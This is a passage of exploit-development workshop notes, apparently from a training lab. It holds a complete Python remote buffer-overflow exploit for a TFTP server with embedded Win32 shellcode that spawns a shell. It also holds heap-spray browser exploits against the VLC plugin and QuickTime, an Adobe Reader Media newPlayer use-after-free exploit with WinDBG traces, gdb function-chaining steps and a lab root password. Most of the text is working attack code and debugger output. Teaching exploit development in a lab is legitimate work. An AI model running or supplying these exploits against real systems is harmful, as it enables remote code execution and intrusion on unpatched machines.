  858. part1 += "\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49"
  859. part1 += "\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d"
  860. part1 += "\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\x24\x01\xeb\x66"
  861. part1 += "\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61"
  862. part1 += "\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40"
  863. part1 += "\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32"
  864. part1 += "\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50\xff\xd6"
  865. part1 += "\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09"
  866. part1 += "\xf5\xad\x57\xff\xd6\x53\x53"
  867.  
  868.  
  869. part2 = "\x53\x53\x53\x43\x53\x43\x53\xff\xd0"
  870. part2 += "\x66\x68\x11\x5c\x66\x53\x89\xe1\x95\x68\xa4\x1a\x70\xc7\x57\xff"
  871. part2 += "\xd6\x6a\x10\x51\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x57\xff\xd6\x53"
  872. part2 += "\x55\xff\xd0\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\x54\x54\x55\xff"
  873. part2 += "\xd0\x93\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\xd0\x66\x6a\x64"
  874. part2 += "\x66\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89"
  875. part2 += "\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\x8d\x7a\x38\xab"
  876. part2 += "\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\x5b\x57\x52\x51"
  877. part2 += "\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53"
  878. part2 += "\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83\xc4\x64\xff\xd6"
  879. part2 += "\x52\xff\xd0\x68\xf0\x8a\x04\x5f\x53\xff\xd6\xff\xd0"
  880.  
  881.  
  882. STACK SHIFTER:
  883. prepend = "\x81\xC4\xFF\xEF\xFF\xFF" # add esp, -1001h
  884. prepend += "\x44" # inc esp
  885.  
  886.  
  887.  
  888.  
  889.  
  890.  
  891.  
  892.  
  893.  
  894.  
  895.  
  896.  
  897.  
  898.  
  899. ---- final script ----
  900.  
  901. #!/usr/bin/python2
  902. #TFTP Server remote Buffer Overflow
  903.  
  904. import sys
  905. import socket
  906. import struct
  907.  
  908. if len(sys.argv) < 2:
  909. sys.stderr.write("Usage: tftpd.py <host>\n")
  910. sys.exit(1)
  911.  
  912. target = sys.argv[1]
  913. port = 69
  914.  
  915. eip = 0x7e429353 # jmp esp in USER32.DLL
  916.  
  917. part1 += "\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45"
  918. part1 += "\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49"
  919. part1 += "\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d"
  920. part1 += "\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\x24\x01\xeb\x66"
  921. part1 += "\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61"
  922. part1 += "\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40"
  923. part1 += "\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32"
  924. part1 += "\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50\xff\xd6"
  925. part1 += "\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09"
  926. part1 += "\xf5\xad\x57\xff\xd6\x53\x53"
  927.  
  928. part2 = "\x53\x53\x53\x43\x53\x43\x53\xff\xd0"
  929. part2 += "\x66\x68\x11\x5c\x66\x53\x89\xe1\x95\x68\xa4\x1a\x70\xc7\x57\xff"
  930. part2 += "\xd6\x6a\x10\x51\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x57\xff\xd6\x53"
  931. part2 += "\x55\xff\xd0\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\x54\x54\x55\xff"
  932. part2 += "\xd0\x93\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\xd0\x66\x6a\x64"
  933. part2 += "\x66\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89"
  934. part2 += "\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\x8d\x7a\x38\xab"
  935. part2 += "\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\x5b\x57\x52\x51"
  936. part2 += "\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53"
  937. part2 += "\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83\xc4\x64\xff\xd6"
  938. part2 += "\x52\xff\xd0\x68\xf0\x8a\x04\x5f\x53\xff\xd6\xff\xd0"
  939.  
  940. prepend = "\x81\xC4\xFF\xEF\xFF\xFF" # add esp, -1001h
  941. prepend += "\x44" # inc esp
  942.  
  943. buf = "\x00\x01" # receive command
  944.  
  945. buf += "\x90" * (256 - len(part2)) # NOPs
  946. buf += part2 # shellcode part 2
  947. buf += struct.pack('<I', eip) # EIP (JMP ESP)
  948. buf += prepend # stack shifter
  949. buf += part1 # shellcode part 1
  950. buf += "\xE9" + struct.pack('<i', -380) # JMP -380
  951. buf += "\x00" # END
  952.  
  953. # print buf
  954.  
  955. # buf = "\x00\x01" # receive command
  956.  
  957. # buf += "A" * 300 + "\x00"
  958.  
  959. sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
  960.  
  961. try:
  962. sock.connect((target, port))
  963. sock.sendall(buf)
  964. except Exception as e:
  965. sys.stderr.write("Cannot send to "+str(target)+" : "+str(port)+" : "+str(e)+"!\n")
  966. finally:
  967. sock.close()
  968. sys.stderr.write("Sent.\n")
  969.  
  970.  
  971.  
  972. -----------------------------------------------------------------------------------------------------------------
  973.  
  974.  
  975.  
  976.  
  977. How does all of this actually work
  978.  
  979.  
  980.  
  981.  
  982. Total shellcode length: 315
  983.  
  984. Part1: 150
  985. Part2: 165
  986.  
  987.  
  988. NOPS * (256 - 165)
  989.  
  990. 91 NOPS + (165 bytes shellcode p2) + JMP ESP (4 bytes) + Stack Shift (-1000) + (150 bytes shellcode p1) + (neg jmp -380)
  991. | | |
  992. 256 260 150 (410) |
  993. |<------------------------------------------------------------------------------------------------------------|
  994. Jump to the
  995. 30 byte mark
  996.  
  997.  
  998.  
  999. ############################
  1000. # Lab 3: Browsers Exploits #
  1001. ############################
  1002.  
  1003. cd C:\Documents and Settings\strategic security\Desktop\ED-Workshop-Files\Lab3\ffvlc_skeleton
  1004. Quicktime - overflow, if we send a very long rtsp:// URL, Quicktime crashes
  1005. rtsp://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA......50000
  1006.  
  1007. <object id=quicktime clsid="999-999999-99-99999">
  1008. <param name="URL" value="rtsp://AAAAAAAAAAAAAAAAAAAAAAAAA....">
  1009. </object>
  1010.  
  1011. var buf = "";
  1012. for(i = 0; i < 50000; i++)
  1013. buf += "A";
  1014. var myobject = document.getElementById("quicktime");
  1015. myobject.url = buf;
  1016.  
  1017. YOU CAN PRE-LOAD THE PROCESS MEMORY MORE OR LESS IN A WAY YOU LIKE BEFORE TRIGGERING THE EXPLOIT!!!!
  1018.  
  1019. - Browsers (Flash)
  1020. - PDF
  1021. - MS Office / OOo
  1022.  
  1023. VLC smb:// exploit
  1024. ------------------
  1025.  
  1026. EXPLOIT VECTOR
  1027.  
  1028. smb://example.com@0.0.0.0/foo/#{AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA}
  1029.  
  1030. Exploit Scripts
  1031. - ffvlc
  1032.  
  1033. ON YOUR HOST, RUN THE WEBSERVER ON PORT 8080
  1034.  
  1035. perl daemon.pl vlc0.html
  1036.  
  1037. ON YOUR Strategicsec-XP-ED-Target-VM VM, START FIREFOX
  1038. Browse to http://your_host_ip_address:8080/
  1039.  
  1040. vlc0.html
  1041. ---------
  1042. <script>
  1043. var buf = "";
  1044. for(i = 0; i < 1250; i++)
  1045. buf += unescape("%41%41%41%41");
  1046. var track = "smb://example.com\@0.0.0.0/foo/#{" + buf + "}";
  1047. document.write("<embed type='application/x-vlc-plugin' target='" + track + "' />");
  1048. </script>
  1049.  
  1050. vlc1.html
  1051. ---------
  1052. <script>
  1053.  
  1054. // shellcode created in heap memory
  1055. var shellcode = unescape("%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc");
  1056.  
  1057. // 800K block of NOPS
  1058. var nop = unescape("%u9090%u09090"); // 4 NOPS
  1059. while(nop.length < 0xc0000) {
  1060. nop += nop;
  1061. }
  1062.  
  1063. // spray the heap with NOP+shellcode
  1064. var memory = new Array();
  1065. for(i = 0; i < 50; i++) {
  1066. memory[i] = nop + shellcode;
  1067. }
  1068.  
  1069. // build the exploit payload
  1070. var buf = "";
  1071. for(i = 0; i < 1250; i++)
  1072. buf += unescape("%41%41%41%41");
  1073. var track = "smb://example.com\@0.0.0.0/foo/#{" + buf + "}";
  1074.  
  1075. // trigger the exploit
  1076. document.write("<embed type='application/x-vlc-plugin' target='" + track + "' />");
  1077. </script>
  1078.  
  1079. perl daemon.pl vlc1.html
  1080.  
  1081. Search for where our NOPS+shellcode lies in the heap
  1082.  
  1083. s 0 l fffffff 90 90 90 90 cc cc cc cc
  1084.  
  1085. 0:019> s 0 l fffffff 90 90 90 90 cc cc cc cc
  1086. 03dffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  1087. 040ffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  1088. 043ffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  1089. 046ffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  1090. 049ffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  1091. 04cffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  1092. 04fffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  1093. 052ffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  1094. 055ffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  1095. 058ffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  1096. 05bffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  1097. 05effffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  1098. 061ffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  1099. 064ffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  1100. 067ffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  1101. 06affffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  1102.  
  1103. Edit vlc2.html
  1104. replace %41%41%41%41 with %07%07%07%07
  1105.  
  1106. (928.fd0): Break instruction exception - code 80000003 (first chance)
  1107. eax=fffffd66 ebx=07070707 ecx=77c2c2e3 edx=00340000 esi=07070707 edi=07070707
  1108. eip=07100000 esp=0e7afc58 ebp=07070707 iopl=0 nv up ei pl nz ac pe nc
  1109. cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000216
  1110. 07100000 cc int 3
  1111. 0:019> u
  1112. 07100000 cc int 3
  1113. 07100001 cc int 3
  1114. 07100002 cc int 3
  1115. 07100003 cc int 3
  1116. 07100004 cc int 3
  1117. 07100005 cc int 3
  1118. 07100006 cc int 3
  1119. 07100007 cc int 3
  1120.  
  1121. Create vlc3.html (Copy vlc2.html to vlc3.html)
  1122. ----------------------------------------------
  1123. Win32 Reverse Shell
  1124. - no restricted characters
  1125. - Encoder NONE
  1126. - use the Javascript encoded payload generated by msfweb
  1127.  
  1128.  
  1129.  
  1130.  
  1131. #######################
  1132. # Lab 4: PDF EXPLOITS #
  1133. #######################
  1134.  
  1135.  
  1136. cd C:\Documents and Settings\strategic security\Desktop\ED-Workshop-Files\Lab4\adobe_mnp_skeleton
  1137. Acrobat Media newPlayer exploit
  1138. -------------------------------
  1139.  
  1140. Use-after-free bug
  1141.  
  1142. Exploit scripts are online at 172.16.0.100
  1143. - adobe_mnp
  1144.  
  1145. Download these scripts on your Strategicsec-XP-ED-Target-VM VM itself.
  1146.  
  1147.  
  1148. mnp0.pdf
  1149.  
  1150. - Open up acrobat reader
  1151. - WinDBG
  1152. - F6 attach to AcroRd32.exe
  1153. - g to Go
  1154.  
  1155. EIP = 41414141
  1156.  
  1157. Next step is to spray the heap with NOPS+shellcode, and then land EIP in the heap.
  1158.  
  1159. mnp1.pdf
  1160.  
  1161. All we are doing is changing EIP to 0c0c0c0c.
  1162. There is no heap spray in this one.
  1163.  
  1164. This exception may be expected and handled.
  1165. eax=02e2d638 ebx=23826917 ecx=02e2d638 edx=02e2f868 esi=02c07674 edi=02c07674
  1166. eip=0c0c0c0c esp=0013fb38 ebp=0013fbb8 iopl=0 nv up ei pl nz na po nc
  1167. cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202
  1168. 0c0c0c0c ?? ???
  1169.  
  1170. We know we get EIP control
  1171.  
  1172. mnp2.pdf
  1173.  
  1174. Put in the heap spray.
  1175.  
  1176. var shellcode = unescape("%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc");
  1177.  
  1178. var nops = unescape("%u9090%u9090");
  1179.  
  1180. while(nops.length <= 32768)
  1181. nops += nops;
  1182. nops = nops.substring(0,32768 - shellcode.length);
  1183.  
  1184. memory = new Array();
  1185.  
  1186. for(i = 0; i < 1500; i++) {
  1187. memory[i] = nops + shellcode;
  1188. }
  1189.  
  1190. 1500 NOP+shellcode blocks of 32K NOPs each
  1191.  
  1192. We would have sprayed over address 0c0c0c0c, and we hope to hit EIP = 0c0c0c0c, and get INT3.
  1193.  
  1194. We want to see what led to the crash.
  1195.  
  1196. EIP is invalid, so we can't disassemble around EIP
  1197.  
  1198. We need to trace the function that called us and crashed.
  1199. - STACK TRACE
  1200. - Dumps all the frames from the top of the stack.
  1201. - show you the series of calls that led up to the crash.
  1202. - we will analyze the topmost function on the frame.
  1203.  
  1204. WinDBG - stack trace - "k" command
  1205.  
  1206. 0:000> k
  1207. ChildEBP RetAddr
  1208. WARNING: Frame IP not in any known module. Following frames may be wrong.
  1209. 0013fb34 2d843117 0x90909090
  1210. 0013fbb8 23826934 Multimedia!PlugInMain+0x41b69
  1211. 0013fbdc 23825d8c EScript!PlugInMain+0x25584
  1212. 0013fc74 238257e2 EScript!PlugInMain+0x249dc
  1213. 0013fca4 238543c5 EScript!PlugInMain+0x24432
  1214. 0013fd04 00a78de1 EScript!PlugInMain+0x53015
  1215. 0013fd20 7e418734 AcroRd32_940000!DllCanUnloadNow+0x67290
  1216. 0013fd4c 7e418816 USER32!InternalCallWinProc+0x28
  1217. 0013fdb4 7e4189cd USER32!UserCallWinProcCheckWow+0x150
  1218. 0013fe14 7e418a10 USER32!DispatchMessageWorker+0x306
  1219. 0013fe24 00a323b4 USER32!DispatchMessageW+0xf
  1220. 0013fe94 00a31de8 AcroRd32_940000!DllCanUnloadNow+0x20863
  1221. 0013fecc 0094389f AcroRd32_940000!DllCanUnloadNow+0x20297
  1222. 0013fee4 009436ee AcroRd32_940000!AcroWinMain+0x1c8
  1223. 0013ff2c 00404004 AcroRd32_940000!AcroWinMain+0x17
  1224. 0013ffc0 7c817067 AcroRd32+0x4004
  1225. 0013fff0 00000000 kernel32!BaseProcessStart+0x23
  1226.  
  1227. 2d843117 -- the return address that we would have returned to, if we didnt crash.
  1228. address 2d843117-2 we will have a CALL instruction.
  1229.  
  1230. u 2d843117
  1231. u 2d843117-2
  1232. u 2d843117-3 <---- we found the CALL instruction - call [edx+4]
  1233. u 2d843117-4
  1234.  
  1235. 0:000> u 2d843117-3
  1236. Multimedia!PlugInMain+0x41b66:
  1237. 2d843114 ff5204 call dword ptr [edx+4] <---- the culprit!!!
  1238. 2d843117 6a00 push 0
  1239. 2d843119 68d8b68c2d push offset Multimedia!PlugInMain+0xca12a (2d8cb6d8)
  1240. 2d84311e 56 push esi
  1241. 2d84311f e842aefdff call Multimedia!PlugInMain+0x1c9b8 (2d81df66)
  1242. 2d843124 83c40c add esp,0Ch
  1243. 2d843127 66b80100 mov ax,1
  1244. 2d84312b 5e pop esi
  1245.  
  1246. We control EDX
  1247. edx=0c0c0c0c
  1248.  
  1249. call [edx+4] = call [0c0c0c10]
  1250. dd edx+4
  1251.  
  1252. 0:000> dd edx+4
  1253. 0c0c0c10 90909090 90909090 90909090 90909090
  1254. 0c0c0c20 90909090 90909090 90909090 90909090
  1255.  
  1256. 0:000> u 2d843117-7
  1257. Multimedia!PlugInMain+0x41b62:
  1258. 2d843110 8b10 mov edx,dword ptr [eax]
  1259. 2d843112 8bc8 mov ecx,eax
  1260. 2d843114 ff5204 call dword ptr [edx+4]
  1261.  
  1262. dd eax
  1263.  
  1264. 0:000> dd eax
  1265. 02e2d680 0c0c0c0c 0c0c0c0c 0c0c0c0c 0c0c0c0c
  1266. 02e2d690 42424242 42424242 42424242 42424242
  1267. 02e2d6a0 42424242 42424242 42424242 42424242
  1268. 02e2d6b0 42424242 42424242 42424242 42424242
  1269. 02e2d6c0 42424242 42424242 00000000 00000000
  1270.  
  1271. mnp3.pdf
  1272.  
  1273. change the NOPs 90909090 to 0c0c0c0c
  1274.  
  1275. mov edx, [eax]
  1276. call [edx+4]
  1277.  
  1278. edx = 0c0c0c0c
  1279. edx+4 = 0c0c0c10
  1280. contents at edx+4 will also be "0c0c0c0c"
  1281.  
  1282. EIP will jump to 0c0c0c0c
  1283.  
  1284. and...
  1285.  
  1286. 0:000> u 0c0c0c0c
  1287. *** WARNING: Unable to verify checksum for C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Multimedia.api
  1288. *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Multimedia.api -
  1289. 0c0c0c0c 0c0c or al,0Ch
  1290. 0c0c0c0e 0c0c or al,0Ch
  1291. 0c0c0c10 0c0c or al,0Ch
  1292. 0c0c0c12 0c0c or al,0Ch
  1293. 0c0c0c14 0c0c or al,0Ch
  1294.  
  1295.  
  1296.  
  1297.  
  1298.  
  1299.  
  1300. #####################
  1301. # Function Chaining #
  1302. #####################
  1303.  
  1304. - SSH into Asterisk VM: root/exploitlab
  1305.  
  1306. cd /home/exploitlab
  1307. cat victim2.c
  1308. make victim2
  1309. ./victim2 AAAAAAAAAAAAA
  1310.  
  1311.  
  1312.  
  1313.  
  1314.  
  1315. gdb victim2
  1316. disassemble main
  1317.  
  1318.  
  1319.  
  1320. - We want to set a breakpoint in main() just before add is called.
  1321. - We want to inspect the calling frame for add():
  1322.  
  1323. break *0x080483cb
  1324.  
  1325. run AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  1326.  
  1327.  
  1328.  
  1329.  
  1330. - We are in main()
  1331. - just before call add()
  1332. - we want to look at the stack
  1333. - In GDB, you can do a stack trace by typing any of the following commands:
  1334.  
  1335. where
  1336. backtrace
  1337. bt
  1338. (gdb) x/i $eip
  1339. => 0x80483cb <main+35>: call 0x8048426 <add>
  1340.  
  1341. (gdb) x/64x $esp
  1342. 0xbffffa60: 0x00000003 0x00000004 0xbffffa88 0x0804846b
  1343. ^^^^^^^^params^^^^^^^
  1344.  
  1345. stepi <------ single step
  1346. where
  1347.  
  1348. (gdb) where
  1349. #0 0x08048426 in add ()
  1350. #1 0x080483d0 in main ()
  1351.  
  1352.  
  1353.  
  1354. quit
  1355. cat frame1.pl
  1356. export EGG=`./frame1.pl`
  1357. gdb victim2
  1358. (gdb) run $EGG
  1359.  
  1360.  
  1361.  
  1362.  
  1363.  
  1364.  
  1365. x/100i 0x80484a5 (looking for a pop/pop/ret)
  1366. quit
  1367. cat frame2.pl
  1368. export EGG=`./frame2.pl`
  1369. gdb victim2
  1370. run $EGG
  1371.  
  1372.  
  1373. stepi
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement